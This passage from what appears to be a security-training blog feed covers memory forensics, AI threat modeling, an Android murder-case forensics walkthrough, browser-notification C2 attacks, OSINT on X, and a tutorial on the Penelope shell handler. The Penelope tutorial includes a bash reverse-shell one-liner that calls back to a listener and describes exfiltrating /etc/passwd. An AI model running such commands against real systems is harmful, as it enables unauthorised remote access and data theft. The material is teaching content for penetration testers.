Yara scan uses rules to hunt for malware patterns across memory. It’s like a custom detector. For example, during a widespread attack like WannaCry, a Yara rule could quickly find infected processes.

Vol 2 takes a rules file path. Vol 3 allows inline rules, a rules file, or a kernel-wide scan.

Volatility 2:

vol.py -f "/path/to/file" yarascan -y "/path/to/file.yar"

Volatility 3:

vol.py -f "/path/to/file" windows.vadyarascan --yara-rules <string>

vol.py -f "/path/to/file" windows.vadyarascan --yara-file "/path/to/file.yar"

vol.py -f "/path/to/file" yarascan.yarascan --yara-file "/path/to/file.yar"

bash$ > vol -f Windows7.vmem windows.vadyarascan --yara-file yara_rules/Wannacrypt.yar

[Screenshot: scanning with Yara rules]

As you can see, we found the malware and all processes related to it with the help of the rule.

Bonus

Using the strings command, you can quickly uncover additional useful details, such as IP addresses, email addresses, and remnants from PowerShell or command prompt activities.

Emails

bash$ > strings Windows7.vmem | grep -oE "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b"

[Screenshot: email addresses recovered from the memory capture]

IPs

bash$ > strings Windows7.vmem | grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b"

[Screenshot: IP addresses recovered from the memory capture]

Powershell and CMD artifacts

bash$ > strings Windows7.vmem | grep -E "(cmd|powershell|bash)[^[:space:]]+"

[Screenshot: PowerShell and CMD artifacts recovered from the memory capture]
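The same strings-and-grep approach recovers other artifacts too. For instance, a quick sketch for URLs lingering in memory:

bash$ > strings Windows7.vmem | grep -oE 'https?://[^[:space:]"]+'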

Summary

By now you should feel comfortable with all the network analysis, file dumps, hives and registries we had to go through. As you practice, your confidence will grow fast. The commands covered here will help you solve most of the cases as they are fundamental. Also, don’t forget that Volatility has a lot more different plugins that you may want to explore. Feel free to come back to this guide anytime you want. Part 1 will remind you how to approach a memory dump, while Part 2 has the commands you need. In this part, we’ve expanded your Volatility toolkit with network scans to track connections, registry tools to check settings, file commands to extract cached items, and miscellaneous scans like malfind for injections and Yara for pattern matching. Together they give you a solid set of steps. 

If you want to turn this into a career, our digital forensics courses are built to get you there. Many students use this training to prepare for industry certifications and job interviews. Our focus is on the practical skills that hiring teams look for.

Using Artificial Intelligence (AI) in Cybersecurity: Automate Threat Modeling with STRIDE GPT

28 November 2025 at 09:48

Welcome back, aspiring cyberwarriors!

The STRIDE methodology has been the gold standard for systematic threat identification, categorizing threats into Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. However, applying STRIDE effectively requires not just understanding these categories but also having the experience to identify how they manifest in specific application architectures.

To solve this problem, we have STRIDE GPT. By combining the analytical power of AI with the proven STRIDE methodology, this tool can generate comprehensive threat models, attack trees, and mitigation strategies in minutes rather than hours or days.

In this article, we’ll walk you through how to install STRIDE GPT, check out its features, and get you started using them. Let’s get rolling!

Step #1: Install STRIDE GPT

First, make certain you have Python 3.8 or later installed on your system.

pi> python3 --version

Now, clone the STRIDE GPT repository from GitHub.

pi > git clone https://github.com/mrwadams/stride-gpt.git

pi> cd stride-gpt

Next, install the required Python dependencies.

pi > pip3 install -r requirements.txt --break-system-packages

This installation process may take a few minutes.

Step #2: Configure Your Groq API Key

STRIDE GPT supports multiple AI providers including OpenAI, Anthropic, Google AI, Mistral, and Groq, as well as local hosting options through Ollama and LM Studio Server. In this example, I’ll be using Groq. Groq provides access to models like Llama 3.3 70B, DeepSeek R1, and Qwen3 32B through their Language Processing Units (LPUs), which deliver inference speeds significantly faster than traditional GPU-based solutions. Besides that, Groq’s API is cost-effective compared to proprietary models.

To use STRIDE GPT with Groq, you need to obtain an API key from Groq. The tool supports loading API keys through environment variables, which is the most secure method for managing credentials. In the stride-gpt directory, you’ll find a file named .env.example. Copy this file to create your own .env file:

pi > cp .env.example .env

Now, open the .env file in your preferred text editor and add the API key.

Step #3: Launch STRIDE GPT

Start the application by running:

pi> python3 -m streamlit run main.py

Streamlit will start a local web server.
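By default, Streamlit listens on port 8501, so the dashboard is usually reachable at:

http://localhost:8501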

Once you copy the URL into your browser, you will see a dashboard similar to the one shown below.

In the STRIDE GPT sidebar, you’ll see a dropdown menu labeled “Select Model Provider”. Click on this dropdown and you’ll see options for OpenAI, Azure OpenAI, Google AI, Mistral AI, Anthropic, Groq, Ollama, and LM Studio Server.

Select “Groq” from this list. The interface will update to show Groq-specific configuration options. You’ll see a field for entering your API key. If you configured the .env file correctly in Step 2, this field should already be populated with your key. If not, you can enter it directly in the interface, though this is less secure as the key will only persist for your current session.

Below the API key field, you’ll see a dropdown for selecting the specific Groq model you want to use. For this tutorial, I selected Llama 3.3 70B.

Step #4: Describe Your Application

Now comes the critical part where you provide information about the application you want to threat model. The quality and comprehensiveness of your threat model depends heavily on the detail you provide in this step.

In the main area of the interface, you’ll see a text box labeled “Describe the application to be modelled”. This is where you provide a description of your application’s architecture, functionality, and security-relevant characteristics.

Let’s work through a practical example. Suppose you’re building a web-based project management application. Here’s the kind of description you should provide:

“This is a web-based project management application built with a React frontend and a Node.js backend API. The application uses JWT tokens for authentication, with tokens stored in HTTP-only cookies. Users can create projects, assign tasks to team members, upload file attachments, and generate reports. The application is internet-facing and accessible to both authenticated users and unauthenticated visitors who can view a limited public project showcase. The backend connects to a PostgreSQL database that stores user credentials, project data, task information, and file metadata. Actual file uploads are stored in an AWS S3 bucket. The application processes sensitive data including user email addresses, project details that may contain confidential business information, and file attachments that could contain proprietary documents. The application implements role-based access control with three roles: Admin, Project Manager, and Team Member. Admins can manage users and system settings, Project Managers can create and manage projects, and Team Members can view assigned tasks and update their status.”

The more specific you are, the more targeted and actionable your threat model will be.

Besides that, near the application description field, you’ll see several dropdowns that help STRIDE GPT understand your application’s security context.

Step #5: Generate Your Threat Model

With all the configuration complete and your application described, you’re ready to generate your threat model. Look for a button labeled “Generate Threat Model” and click it.

Once complete, you’ll see a comprehensive threat model organized by the STRIDE categories. For each category, the model will identify specific threats relevant to your application. Let’s look at what you might see for our project management application example:

Each threat includes a detailed description explaining how the attack could be carried out and what the impact would be.

Step #6: Generate an Attack Tree

Beyond the basic threat model, STRIDE GPT can generate attack trees that visualize how an attacker might chain multiple vulnerabilities together to achieve a specific objective.

The tool generates these attack trees in Mermaid diagram format, which renders as an interactive visual diagram directly in your browser.

Step #7: Review DREAD Risk Scores

STRIDE GPT implements the DREAD risk scoring model to help you prioritize which threats to address first.

The tool will analyze each threat and assign scores from 1 to 10 for five factors:

Damage: How severe would the impact be if the threat were exploited?

Reproducibility: How easy is it to reproduce the attack?

Exploitability: How much effort and skill would be required to exploit the vulnerability?

Affected Users: How many users would be impacted?

Discoverability: How easy is it for an attacker to discover the vulnerability?

The DREAD assessment appears in a table format showing each threat, its individual factor scores, and its overall risk score.

Step #8: Generate Mitigation Strategies

Identifying threats is only half the battle. You also need actionable guidance on how to address them. STRIDE GPT includes a feature to generate specific mitigation strategies for each identified threat.

Look for a button labeled “Mitigations” and click it.

These mitigation strategies are specific to your application’s architecture and the threats identified. They’re not generic security advice but targeted recommendations based on the actual risks in your system.

Step #9: Generate Gherkin Test Cases

One of the most innovative features of STRIDE GPT is its ability to generate Gherkin test cases based on the identified threats. Gherkin is a business-readable, domain-specific language used in Behavior-Driven Development to describe software behaviors without detailing how that behavior is implemented. These test cases can be integrated into your automated testing pipeline to ensure that the mitigations you implement actually work.

Look for a button labeled “Generate Test Cases”. When you click it, STRIDE GPT will create Gherkin scenarios for each major threat.

Summary

Traditional threat modeling takes a lot of time and requires experts, which stops many organizations from doing it well. STRIDE GPT makes threat modeling easier for everyone by using AI to automate the analysis while keeping the quality of the proven STRIDE method.

In this article, we checked out STRIDE GPT and went over its main features. No matter if you’re protecting a basic web app or a complicated microservices setup, STRIDE GPT gives you the analytical tools you need to spot and tackle security threats in a straightforward way.

Mobile Forensics: Investigating a Murder

26 November 2025 at 12:52

Welcome back, dear digital investigators! 

Today, we’re exploring mobile forensics, a field that matters deeply in modern crime investigations. Think about how much our phones know about us. They carry our contacts, messages, locations, and app history; in many ways, they are a living log of our daily lives. Because they travel with us everywhere, they can be a goldmine of evidence when something serious happens, like a crime. In a murder investigation, for instance, a suspect’s or a victim’s phone can help us answer critical questions: Who were they in touch with right before the crime? Where did they go? What were they doing? What kind of money dealings were they involved in? All of this makes mobile forensics powerful for investigators. As digital forensic specialists, we use that data to reconstruct timelines, detect motives, and understand relationships. Because of this, even a seemingly small app on a phone might have huge significance. For example, financial trading apps may reveal risky behavior or debt. Chat apps might contain confessions or threats. Location logs might show the victim visiting unusual places.

The Difference Between Android and iOS Forensics

When we do mobile forensics, we usually see Android and iOS devices. These two operating systems are quite different under the hood, and that affects how we work with them. On Android, there’s generally more openness. The file system for many devices is more accessible, letting us examine data stored in app directories, caches, logs, and more. Because Android is so widespread and also fragmented with many manufacturers and versions, the data we can access depends a lot on the model and version. 

On iOS, things are tighter. Apple uses its own file system (APFS), and there’s strong encryption, often backed by secure hardware. That means extracting data can be more challenging. Because of this, forensic tools must be very sophisticated to handle iOS devices.

When it comes to which has more usable data, Android often gives us more raw artifacts because of its flexibility. But iOS can also be very rich, especially when data is backed up to iCloud or when we can legally access the device in powerful ways.

The Tools For the Job

One of the most powerful tools is Cellebrite, which is used by law enforcement and digital forensic labs. Cellebrite’s tools are capable of extracting data from both Android and iOS devices, sometimes even from locked devices. But the ability to extract depends a lot on the device model, its security patch level, and how encrypted it is.

[Image: Cellebrite]

There’s an interesting twist when it comes to GrapheneOS, which is a very security-focused version of Android. According to reports, Cellebrite tools struggle more with GrapheneOS, especially on devices updated after 2022. In some cases, they may be able to do a “consent-based” extraction (meaning the phone has to be unlocked by the user), but they can’t fully bypass the security on a fully patched GrapheneOS phone. Because of that, from a security perspective, users are strongly encouraged to keep their firmware and operating system updated. Regular updates close vulnerabilities. Also, using strong passcodes, enabling encryption, and being careful about where sensitive data is stored can make a real difference in protecting personal data.

Our Case: Investigating a Murder Using an Android Phone

Now, let’s turn to our case. We are in the middle of a murder investigation, and we’ve managed to secure the victim’s Android phone. After talking with witnesses and people who were close to the victim, we believe this phone holds critical evidence. To analyze all of that, we are using ALEAPP, a forensic tool made specifically for parsing Android data.

ALEAPP and How It Works

ALEAPP stands for Android Logs, Events, And Protobuf Parser. It’s an open-source tool maintained by the forensic community. Basically, ALEAPP allows us to take the extracted data from an Android phone, whether it’s a logical extraction, a TAR or ZIP file, or a file-system dump and turn that raw data into a human-readable, well-organized report. ALEAPP can run through a graphical interface, which is very friendly and visual, or via command line, depending on how you prefer to work. As it processes data, it goes through different modules for things like call logs, SMS, app usage, accounts, Wi-Fi events, and more. In the end, it outputs a report, so you can easily explore and navigate all the findings.

You can find the repository here:

https://github.com/abrignoni/ALEAPP
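For reference, a typical command-line run looks like the sketch below; the -t flag names the extraction type (fs for a file-system dump, or tar/zip/gz for archives), and the input and output paths are placeholders:

kali > python3 aleapp.py -t fs -i /path/to/extraction -o /path/to/output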

What We Found on the Victim’s Phone

We started by examining the internal storage of the Android device, especially the /data folder. This is where apps keep their private data, caches, and account information. Then, we prepared a separate place on our investigation workstation, a folder called output, where ALEAPP would save its processed data.

[Image: Evidence folders]

Once ALEAPP was ready, we launched it and pointed it to the extracted directories. We left all its parsing modules turned on so we wouldn’t miss any important artifact. We clicked “Process,” and depending on the size of the extracted data, we waited for a few minutes while ALEAPP parsed everything.

[Screenshot: Setting up ALEAPP]

When the processing was done, a new folder appeared inside our output directory. In that folder, there was a file called index.html, which is our main report. We opened it with a browser and the GUI showed us different categories. The interface is clean and intuitive, so even someone not deeply familiar with command-line tools can navigate it.

[Image: viewing the case overview in ALEAPP]

Evidence That Stood Out

One of the first things that caught our attention was a trading app. ALEAPP showed an installed application named OlympTrade. A quick web search confirmed that OlympTrade is a real online trading platform. That fits with what witnesses told us. The victim was involved in trading, possibly borrowing or investing money. We also noted a hash value for the app in our report, which helps prove the data’s integrity. This means we can be more confident that what we saw hasn’t been tampered with.

[Image: viewing installed apps in ALEAPP]
[Image: OlympTrade]

Next, we turned to text messages. According to the victim’s best friend’s testimony, the victim avoided some calls and said he owed a lot of money. When we checked SMS data in ALEAPP, we found a thread where the victim indeed owed $25,000 USD to someone.

[Image: viewing text messages in ALEAPP]

We looked up the number in the contacts list, and it was saved under the name John Oberlander. That makes John an important person of interest in this investigation.

[Image: viewing contacts in ALEAPP]

Then, we dove into location data. The victim’s family said that on September 20, 2023, he left his home without saying where he was going. In ALEAPP’s “Recent Activity” section, which tracks events like Wi-Fi connections, GPS logs, and other background activity, we saw evidence placing him at The Nile Ritz-Carlton in Cairo, Egypt. This is significant: a 5-star hotel could have security footage, check-in records, or payment logs. Investigators would almost certainly reach out to the hotel to reconstruct his stay.

[Image: viewing recent activity in ALEAPP]

The detective pressed on with his investigation and spoke with the hotel staff, hoping to fill in more of the victim’s final days. The employees confirmed that the victim had booked a room for ten days and was supposed to take a flight afterward. Naturally, the investigator wondered whether the victim had saved any ticket information on the phone, since many people store their travel plans digitally nowadays. Even though no tickets turned up in the phone’s files, the search did reveal something entirely different, and potentially much more important. We looked at Discord, since the app appeared in the list of installed applications. Discord logs can reveal private chats, plans, and sometimes illicit behavior. In this case, we saw a conversation indicating that the victim changed his travel plans. He postponed a flight to October 1st, according to the chat.

[Image: viewing Discord messages in ALEAPP]

Later, he agreed to meet someone in person at a very specific place. It was the Fountains of Bellagio in Las Vegas. That detail could tie into motive or meetings related to the crime.

[Image: viewing Discord messages in ALEAPP]
[Image: the Fountains of Bellagio is the agreed meeting place]

What Happens Next

At this stage, we’ve collected and parsed digital evidence, but our work is far from over. Now, we need to connect the phone-based data to the real world. That means requesting more information from visited places, checking for possible boarding or ticket purchases, and interviewing people named in the phone, like John Oberlander, or the person from Discord.

We might also want to validate the financial trail through the trading platform (if we can access it legally), bank statements, or payment records. And importantly, we should search for other devices or backups. Maybe the victim had cloud backups, like Google Drive, or other devices that could shed more light.

Reconstructed Timeline

The victim was heavily involved in trading and apparently owed $25,000 USD to John Oberlander. On September 20, 2023, he left his residence without telling anyone where he was headed. The phone’s location data places him later that day at The Nile Ritz-Carlton in Cairo, suggesting he stayed there. Sometime afterward, according to Discord chats, he changed his travel plans and his flight was rescheduled for October 1. During these chats, he arranged a meeting with someone at the Fountains of Bellagio in Las Vegas.

Summary

Mobile forensics is a deeply powerful tool when investigating crimes. A single smartphone can hold evidence that helps reconstruct what happened, when, and with whom. Android devices often offer more raw data because of their openness, while iOS devices pose different challenges due to their strong encryption. Tools like ALEAPP let us parse all of that data into meaningful and structured reports.

In the case we’re studying, the victim’s phone has offered us insights into his financial troubles, his social connections, his movements, and his plans. But digital evidence is only one piece. To solve a crime, we must combine what we learn from devices with interviews, external records, and careful collaboration with other investigators.

Our team provides professional mobile forensics services designed to support individuals, organizations, and legal professionals who need clear, reliable answers grounded in technical expertise. We also offer a comprehensive digital forensics course for those who want to build their own investigative skills and understand how evidence is recovered, analyzed, and preserved. And if you feel that your safety or your life may be at risk, reach out immediately. Whether you need guidance, assistance, or a deeper understanding of the digital traces surrounding your case, we are here to help.

Check out our Mobile Forensics training to dive deeper into these techniques

Command and Control (C2): Using Browser Notifications as a Weapon

26 November 2025 at 10:16

Welcome back, my aspiring hackers!

Nowadays, we often discuss the importance of protecting our systems from malware and sophisticated attacks. We install antivirus software, configure firewalls, and maintain vigilant security practices. But what happens when the attack vector isn’t a malicious file or a network exploit, but rather a legitimate browser feature you’ve been trusting?

This is precisely the threat posed by a new command-and-control platform called Matrix Push C2. This browser-native, fileless framework leverages push notifications, fake alerts, and link redirects to target victims. The entire attack occurs through your web browser, without first infecting your system through traditional means.

In this article, we will explore the architecture of browser-based attacks and investigate how Matrix Push C2 weaponizes it. Let’s get rolling!

The Anatomy of a Browser-Based Attack

Matrix Push C2 abuses the web push notification system, a legitimate browser feature that websites use to send updates and alerts to users who have opted in. Attackers first trick users into allowing browser notifications through social engineering on malicious or compromised websites.

Once a user subscribes to the attacker’s notifications, the attacker can push out fake error messages or security alerts at will, and they look scarily real. These messages appear as if they are from the operating system or trusted software, complete with official-sounding titles and icons.

The fake alerts might warn about suspicious logins to your accounts, claim that your browser needs an urgent security update, or suggest that your system has been compromised and requires immediate action. Each notification includes a convenient “Verify” or “Update” button that, when clicked, takes the victim to a bogus site controlled by the attackers. This site might be a phishing page designed to steal credentials, or it might attempt to trick you into downloading actual malware onto your system. Because this whole interaction is happening through the browser’s notification system, no traditional malware file needs to be present on the system initially. It’s a fileless technique that operates entirely within the trusted confines of your web browser.

Inside the Attacker’s Command Center

Matrix Push C2 is offered as a malware-as-a-service kit to other threat actors, sold directly through crimeware channels, typically via Telegram and cybercrime forums. The pricing structure follows a tiered subscription model that makes it accessible to criminals at various levels of sophistication. According to the security firm BlackFog, Matrix Push C2 costs approximately $150 for one month, $405 for three months, $765 for six months, and $1,500 for a full year. Payments are accepted in cryptocurrency, and buyers communicate directly with the operator for access.

From the attacker’s perspective, the interface is intuitive. The campaign dashboard displays metrics like total clients, delivery success rates, and notification interaction statistics.

[Image source: BlackFog]

As soon as a browser is enrolled by accepting the push notification subscription, it reports data back to the command-and-control server.

[Image source: BlackFog]

Matrix Push C2 can detect the presence of browser extensions, including cryptocurrency wallets like MetaMask, identify the device type and operating system, and track user interactions with notifications. Essentially, as soon as the victim permits the notifications, the attacker gains a telemetry feed from that browser session.

Social Engineering at Scale

The core of the attack is social engineering, and Matrix Push C2 comes loaded with configurable templates to maximize the credibility of its fake messages. Attackers can easily theme their phishing notifications and landing pages to impersonate well-known companies and services. The platform includes pre-built templates for brands such as MetaMask, Netflix, Cloudflare, PayPal, and TikTok, each designed to look like a legitimate notification or security page from those providers.

[Image source: BlackFog]

Because these notifications appear in the official notification area of the device, users may assume their own system or applications generated the alert.

Defending Against Browser-Based Command and Control

As cyberwarriors, we must adapt our defensive strategies to account for this new attack vector. The first line of defense is user education and awareness. Users need to understand that browser notification permission requests should be treated with the same skepticism as requests to download and run executable files. Just because a website asks for notification permissions doesn’t mean you should grant them. In fact, most legitimate websites function perfectly well without push notifications, and the feature is often more of an annoyance than a benefit. If you believe that your team needs to update their skills for current and upcoming threats, consider our recently published Security Awareness and Risk Management training.

Beyond user awareness, technical controls can help mitigate this threat. Browser policies in enterprise environments can be configured to block notification permissions by default or to whitelist only approved sites. Network security tools can monitor for connections to known malicious notification services or suspicious URL shortening domains.
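As one concrete illustration, here is a way to enforce such a policy for Chrome on Windows through the registry. This is a sketch assuming policy-managed Chrome; DefaultNotificationsSetting is Chrome’s documented policy, and a value of 2 blocks notification prompts for all sites:

PS > reg add "HKLM\SOFTWARE\Policies\Google\Chrome" /v DefaultNotificationsSetting /t REG_DWORD /d 2 /f

Edge supports a policy of the same name under its own Policies key, and Firefox offers an equivalent through its enterprise policy templates.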

Summary

The fileless, cross-platform nature of this attack makes it particularly dangerous and difficult to detect using traditional security tools. However, by combining user awareness, proper browser configuration, and anti-data exfiltration technology, we can defend against this threat.

In this article, we briefly explored how Matrix Push C2 operates. Understanding it is a first step in protecting yourself and your organization from this emerging attack vector.

Smart Home Hacking, January 13-15

By: OTW
25 November 2025 at 11:39

Welcome back, my aspiring cyberwarriors!

Smart homes are increasingly common in our digital world, and smart home devices have become key targets for malicious hackers, largely due to their weak security. In 2025, attacks on connected devices rose 400 percent, with average breach costs hitting $5.4 million.

In this three-day class, we will explore and analyze the various security weaknesses of these smart home devices and protocols.

Course Outline

  1. Introduction and Overview of Smart Home Devices
  2. Weak Authentication on Smart Home Devices
  3. RFID and Smart Home Security
  4. Bluetooth and Bluetooth LE vulnerabilities in the home
  5. Wi-Fi vulnerabilities and how they can be leveraged to take over all the devices in the home
  6. LoRa vulnerabilities
  7. IP Camera vulnerabilities
  8. Zigbee vulnerabilities
  9. Jamming Wireless Technologies in the Smart Home
  10. How attackers can pivot from an IoT device in the home to take over your phone or computer
  11. How to Secure Your Smart Home

This course is part of our Subscriber Pro training package

Unraveling the Web of Russian Disinformation Campaigns

By: OTW
24 November 2025 at 23:30

Introduction:

Hello, Hackers Arise community. In this post, we delve into the complex world of Russian disinformation campaigns on the internet. As Master OTW clearly established in his interview with Yaniv Hoffman (watch the video below), the disinformation campaigns run by high-ranking Russian authorities are nothing new. They have been refined for decades, and the Russians have become extremely adept at them, especially now with the internet and social media. Throughout the years, they have dedicated themselves to spreading hatred, envy, and resentment worldwide. We could classify this as psychological warfare operations taken to the extreme, since they aim not only to misinform or influence specific strategic targets but also to divide and set the entire world against itself.

We do not say this capriciously; there are foundations and information that support our arguments. Nor do we intend to hide or minimize the fact that all nation-states carry out these types of operations, but in the case of the Russian authorities, the intent redefines the concept of pure malevolence.

https://www.youtube.com/watch?v=t2P6iADGnpE

With the rise of social media and interconnected platforms, information dissemination has become a powerful tool for shaping public opinion. Russia, among other countries, has been at the forefront of exploiting these channels to advance its strategic goals. This article aims to shed light on the methods, motives, and implications of Russia’s disinformation campaigns while underlining the importance of critical thinking and media literacy in navigating the digital landscape.


Understanding Disinformation:

Disinformation is the dissemination of false or misleading information with the intention to deceive or manipulate the public. Russia has become notorious for employing sophisticated techniques to influence global narratives on a wide range of issues, from political events to social debates and international relations. Understanding the multifaceted nature of disinformation is crucial in recognizing and countering its effects.

The following link leads to a study whose key points, listed below, capture the main characteristics of this type of operation carried out by the Russian authorities:

  – Russian Propaganda Is High-Volume and Multichannel
  – Russian Propaganda Is Rapid, Continuous, and Repetitive
  – Russian Propaganda Makes No Commitment to Objective Reality
  – Russian Propaganda Is Not Committed to Consistency

Methods Used:

Russia employs an array of methods to propagate disinformation effectively. These include the use of bots and troll farms to flood social media with false narratives, the creation and distribution of deceptive content, and the manipulation of search engine algorithms to amplify biased information. By utilizing these methods, Russia can create an illusion of consensus and spread narratives that align with its geopolitical interests.

“The Russian Federation has engaged in a systematic, international campaign of disinformation, information manipulation and distortion of facts in order to enhance its strategy of destabilisation of its neighbouring countries, the EU and its member states. In particular, disinformation and information manipulation has repeatedly and consistently targeted European political parties, especially during the election periods, civil society and Russian gender and ethnic minorities, asylum seekers and the functioning of democratic institutions in the EU and its member states.

In order to justify and support its military aggression of Ukraine, the Russian Federation has engaged in continuous and concerted disinformation and information manipulation actions targeted at the EU and neighbouring civil society members, gravely distorting and manipulating facts.” (Source)

The mass media outlets mentioned above are either state-owned or corporations serving the state. Putin, however, does not tolerate independent journalism doing its job, which is why he has taken action against it (Source). Take a look at the budget the Russian high command allocates to those platforms to deploy disinformation.

Motives Behind the Campaigns:

The motives driving Russia’s disinformation campaigns are diverse and can be linked to political, economic, and security-related goals. Destabilizing rival countries, sowing discord among allies, discrediting political opponents, and undermining democratic processes are some of the key objectives pursued through these campaigns. Understanding these motives is essential in formulating an effective response. If you still don’t believe that they spread hate all over the internet, take a look at these myths, whose explanations are debunked in the source we provided.

And what about the Russian troll farm?

Implications and Impact:

The impact of Russian disinformation campaigns is far-reaching. They can polarize societies, erode trust in democratic institutions, and exacerbate existing divisions within nations. In international affairs, disinformation can escalate tensions between countries and influence public opinion on foreign policy matters. Moreover, the erosion of trust in media sources can lead to a decline in accurate information and the rise of echo chambers. Russian officials and pro-Russian media capitalized on the fear and uncertainty caused by the COVID-19 pandemic, actively spreading conspiracy theories. Among these theories, they focused on false U.S. bio-weapon infrastructure claims. One notable example is an article published by New Eastern Outlook on 20th February, available in both Russian and English, alleging that the U.S. deployed a biological weapon against China.


Fighting Back:

Countering Russian disinformation requires a comprehensive approach. Governments, tech companies, and civil society must collaborate to identify and expose false narratives, invest in media literacy programs, and enhance cybersecurity measures to protect against information warfare. Educating the public on critical thinking and fact-checking is a powerful tool in combating the spread of disinformation. As hackers and advocates of freedom in cyberspace, this is also our responsibility; we must make it our mission and our duty to ensure free access to information.


Conclusion:

The internet has opened up new frontiers for information dissemination, but it has also become fertile ground for disinformation campaigns. Russia’s approach to shaping narratives on a global scale requires a vigilant and proactive response from the international community. By fostering media literacy and promoting responsible online behavior, we can safeguard the integrity of information and fortify our societies against the perils of disinformation.

Smouk out!


Offensive Security: Get Started with Penelope for Advanced Shell Management

24 November 2025 at 17:02

Welcome back, aspiring cyberwarriors!

In the world of penetration testing and red team operations, one of the most critical moments comes after you’ve successfully exploited a target system. You’ve gained initial access, but now you’re stuck with a basic, unstable shell that could drop at any moment. You need to upgrade that shell, manage multiple connections, and maintain persistence without losing your hard-won access.

Traditional methods of shell management are fragmented and inefficient. You might use netcat for catching shells, then manually upgrade them with Python or script commands, manage them in separate terminal windows, and hope you don’t lose track of which shell connects to which target. Or you can use Penelope to handle all those things.

Penelope is a shell handler designed specifically for hackers who demand more from their post-exploitation toolkit. Unlike basic listeners like netcat, Penelope automatically upgrades shells to fully interactive TTYs, manages multiple sessions simultaneously, and provides a centralized interface for controlling all your compromised systems.

In this article, we will install Penelope and explore its core features. Let’s get rolling!

Step #1: Download and Install Penelope

In this tutorial, I will be installing Penelope on my Raspberry Pi 4, but the tool works equally well on any Linux distribution or macOS system with Python 3.6 or higher installed. The installation process is straightforward, since Penelope is just a Python script.

First, navigate to the GitHub repository and clone the project to your system:
pi> git clone https://github.com/brightio/penelope.git

pi> cd penelope

Once the download completes, you can verify that Penelope is ready to use by checking its help menu:

pi> python3 penelope.py -h

You should see a comprehensive help menu displaying all of Penelope’s options and capabilities. This confirms that the tool is properly installed and ready for use.

Step #2: Starting a Basic Listener

The most fundamental use case for Penelope is catching reverse shells from compromised targets. Unlike netcat, which simply listens on a port and displays whatever connects, Penelope manages the incoming connection and prepares it for interactive use.

To start a basic listener on port 4444, execute the following command:

pi> python3 penelope.py

Penelope will start listening on the default port and display a status message indicating it’s ready to receive connections.

Now let’s simulate a compromised target connecting back to your listener.
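A quick way to do that in a lab is a classic Bash reverse shell one-liner fired from the target machine. The IP address below is a placeholder for your listener, and we assume Bash is present on the target:

target> bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'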

You should see Penelope display information about the new session, including an assigned session ID, the target’s IP address, and the detected operating system. The shell is automatically upgraded to a fully interactive TTY, meaning you now have tab completion, the ability to use text editors like Vim, and proper handling of special characters.

Step #3: Managing Multiple Sessions

Let’s simulate managing multiple targets. In the current session, press F12 to open the menu, where you can type help to explore the available options.

We’re interested in adding a new listener, so the command will be:

penelope > listeners add -p <port>

Each time a new target connects, Penelope assigns it a unique session ID and adds it to your session list.

To view all active sessions, use the sessions command within Penelope:

penelope > sessions

This displays a table showing all connected targets with their session IDs, IP addresses and operating systems.

To interact with a specific session, use the session ID. For example, to switch to session 2:

penelope > interact 2

Step #4: Uploading and Downloading Files

File transfer is a constant requirement during penetration testing engagements. You need to upload exploitation tools, download sensitive data, and move files between your attack system and compromised targets. Penelope includes built-in file transfer capabilities that work regardless of what tools are available on the target system.

To upload a file from your attacking system to the target, use the upload command. Let’s say you want to upload a Python script called script.py to the target:

penelope > upload /home/air/Tools/script.py

Downloading files from the target works similarly. Suppose you’ve discovered a sensitive configuration file on the compromised system that you need to exfiltrate:

penelope > download /etc/passwd

Summary

Traditional tools like netcat provide basic listening capabilities but leave you manually managing shell upgrades, juggling terminal windows, and struggling to maintain organized control over your compromised infrastructure. Penelope solves these problems. It provides the control and organization you need to work efficiently and maintain access to your hard-won, compromised systems.

The tool’s automatic upgrade capabilities, multi-session management, built-in file transfer, and session persistence features make it a valuable go-to solution for cyberwarriors. Keep an eye on it—it may find a place in your hacking toolbox.

Open Source Intelligence (OSINT): Strategic Techniques for Finding Info on X (Twitter)

24 November 2025 at 10:34

Welcome back, my aspiring digital investigators!

In the rapidly evolving landscape of open source intelligence, Twitter (now rebranded as X) has long been considered one of the most valuable platforms for gathering real-time information, tracking social movements, and conducting digital investigations. However, the platform’s transformation under Elon Musk’s ownership has fundamentally altered the OSINT landscape, creating unprecedented challenges for investigators who previously relied on third-party tools and API access to conduct their research.

The golden age of Twitter OSINT tools has effectively ended. Applications like Twint, GetOldTweets3, and countless browser extensions that once provided investigators with powerful capabilities to search historical tweets, analyze user networks, and extract metadata have been rendered largely useless by the platform’s new API restrictions and authentication requirements. What was once a treasure trove of accessible data has become a walled garden, forcing OSINT practitioners to adapt their methodologies and embrace more sophisticated, indirect approaches to intelligence gathering.

This fundamental shift represents both a challenge and an opportunity for serious digital investigators. While the days of easily scraping massive datasets are behind us, the platform still contains an enormous wealth of information for those who understand how to access it through alternative means. The key lies in understanding that modern Twitter OSINT is no longer about brute-force data collection, but rather about strategic, targeted analysis using techniques that work within the platform’s new constraints.

Understanding the New Twitter Landscape

The platform’s new monetization model has created distinct user classes with different capabilities and visibility levels. Verified subscribers enjoy enhanced reach, longer post limits, and priority placement in replies and search results. This has created a new dynamic where information from paid accounts often receives more visibility than content from free users, regardless of its accuracy or relevance. For OSINT practitioners, this means understanding these algorithmic biases is essential for comprehensive intelligence gathering.

The removal of legacy verification badges and the introduction of paid verification has also complicated the process of source verification. Previously, blue checkmarks provided a reliable indicator of account authenticity for public figures, journalists, and organizations. Now, anyone willing to pay can obtain verification, making it necessary to develop new methods for assessing source credibility and authenticity.

Content moderation policies have also evolved significantly, with changes in enforcement priorities and community guidelines affecting what information remains visible and accessible. Some previously available content has been removed or restricted, while other types of content that were previously moderated are now more readily accessible. Also, the company updated its terms of service to officially say it uses public tweets to train its AI.

Search Operators

The foundation of effective Twitter OSINT lies in knowing how to craft precise search queries using X’s advanced search operators. These operators allow you to filter and target specific information with remarkable precision.

You can access the advanced search interface through the web version of X, but knowing the operators allows you to craft complex queries directly in the search bar.

Here are some of the most valuable search operators for OSINT purposes:

from:username – Shows tweets only from a specific user

to:username – Shows tweets directed at a specific user

since:YYYY-MM-DD – Shows tweets after a specific date

until:YYYY-MM-DD – Shows tweets before a specific date

near:location within:miles – Shows tweets near a location

filter:links – Shows only tweets containing links

filter:media – Shows only tweets containing media

filter:images – Shows only tweets containing images

filter:videos – Shows only tweets containing videos

filter:verified – Shows only tweets from verified accounts

